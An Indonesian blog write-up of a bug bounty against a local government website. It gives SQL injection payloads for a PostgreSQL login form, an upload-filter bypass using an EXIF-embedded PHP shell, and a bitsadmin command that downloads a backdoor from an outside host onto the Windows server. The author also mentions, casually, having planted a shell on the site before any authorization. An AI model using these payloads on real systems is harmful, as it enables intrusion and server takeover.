[Bug Bounty] PostGre-SQL Injection on Login From & Bypass Backdoor Upload

Assalamualaikum Akhiy & Ukhtiy..!

Kenalin ini blog baru yang di buat Oleh bang Salman Rai (partner ngeblog gue), yang mana kita milih nama Santri Heker berdasarkan tittle kita, yaitu "SANTRI".

Itu sekilah tentang blog baru kita, nah sekarang lansung ke pembahasan yaitu "[Bug Bounty] PostGre-SQL Injection on Login From & Bypass Backdoor Upload".

Postingan ini udah ane buat di Facebook ane yaitu di link ini. Ada yang ngomen "tumben indo ngasih?", jawabannya simpel "Orang Dalem", hehe.

Sedikit cerita ane penduduk di Kab. Probolinggo sob, jadi ane udah punya kenalan orang Diskominfo, jadi dia pernah ngomong ke ane kalo ada suatu web sering di retas, disusupi atau indexnya diubah, nah disitu ane tertarik dan ane pun nanyain domainnya, dan duarrr, ternyata ane pernah nanem shell di website ini gan, dan ane disaranin buat bikin laporan lewat email, dan laporannya harus disusun rapi dengan dokumen soft-copy, dan presentasi ketika meet-up nanti (karena adanya pandemi covid-19 meet-up-nya dibatalkan dan mereka mentransfer uang sesuai dengan yang di janjikan).

Sedikit kecewa dengan ditiadakannya meet-up bareng mereka, ya tapi seneng juga dapet duid buat biaya makan dipondok hehe.

Oke sekarang kita bahas bagaimana saya melakukan SQL Injection di Form Login dulu.

Pertama ketika ane buka url yang diberikan oleh Bpk.<sensor> (sensor gan, soalnya kata dia gak boleh di publikasiin namanya sama kontak dll. intinya harus privasi pas bikin write-up), muncul halaman hanya seperti ini.

Hal pertama yang ada dipikiran ane adalah "Bypass Admin", dan ane pun lansung mengeksekusi dengan payload u/p ('=''or') tanpa tanda kurung, dan ane terkejut dengan kemuncul text yang ada di dalam tersebut, yaitu error statement PostGreSQL.

Kenapa ane terkejut? jarang2 lah nemu target kek gini, ane pun gada referensi, dan pada akhirnya ane nyoba Manual SQL Injection buat dapetin data, karena kemungkinan muncul data.

dan ane coba isi username dengan value ( ' order by 1 -- ) dan password dengan ( ' ), dan hanya muncul tulisan "error" saja.

dan angka demi angka ane coba, dan tepatlah di angka 8 error pun muncul.

Nah next ane coba isi username dengan text ( ' union select NULL, NULL, NULL, NULL, NULL, NULL, NULL -- - ) dan password ( ' ), kenapa bukan angka 1-8 kok malah NULL 8 kali? setelah ane liat referensi SQL Injection Postgresql ketika query "union select" angka diganti NULL, sepaham ane gitu, kalo ada pemahaman lain, yamaap, ini cuma opini, hehe.

Oke apa yang muncul setelah itu? Duaaarrr, ternyata bukan data malah Dashboard Admin.

Disini ane terlihat seneng banget, dan udah berasa mau dapet duid, setelah ane lapor, ketemen ane yang kerja disana, ternyata masih membutuhkan tahap bagaimana hacker bisa mengontrol file yang ada didalam server? sedangkan didalam dashboard tidak ada file manager.

Nah disini ane muter-muter mencari uploader dan menemukan halamannya, tampilannya kek gini.

Nah disitu ane lansung gas upload file dengan extensi .php, karena beberapa uploader image yang ane temukan ada yang tidak memfilter ekstensi, dan hasilnya nihil, ternyata ada filter, dan ane coba bypass dengan extensi .php.pjpeg + shell dari gambar yang di tanamkan command PHP dengan EXIF (file shell bisa di download disini), apa yang terjadi? gambar terupload, namun tidak terdapat perubahan.

Dan ane mencoba mencari backdoor yang udah ane tanam, dan GOTCHAA!!, I found it.

It's time to RCE, hehehe.
Untuk menambah ilmu, karena sebagimana kita ketahui, servernya windows nih, nah berarti bukan pake command Linux dong, pasti windows juga command yang harus di insert, so ane pernah nyoba download file dengan CMD, dan ane coba insert command pake text ( bitsadmin /transfer shell /download /priority normal https://linkbackdoor.com/filex.txt D:\<redacted>\bekdur.php )

dan shell pun terdownload dan setelah ane buka, muncullah Backdoor.

Dan menurut ane udah banyak yg kenal nih web, karena ane perhatiin bugnya umum banget, tapi setelah ane nerima bounty belum ada patching, tapi ane dapet ijin, kalo ada file mencurigakan tolong dihapus.

Yaps, mungkin itu doang ilmu yang bisa ane share ke Akhiy dan Ukhtiy sekalian, mungkin tulisannya semrawut ato ada yang gajelas, bahkan terlalu panjang, mohon dimaklumi, ane tulis ini juga untuk newbie, macem ane:v

Perlu diinget, ada unsur orang dalem juga disini gan:v (tapi bukan buat bocorin source code, buat laporin betapa kritikalnya bug ini), jadi untuk web pemerintahan jangan terlalu ngarep duid, kalo gada orang dalem buat jelasin impact2nya :v.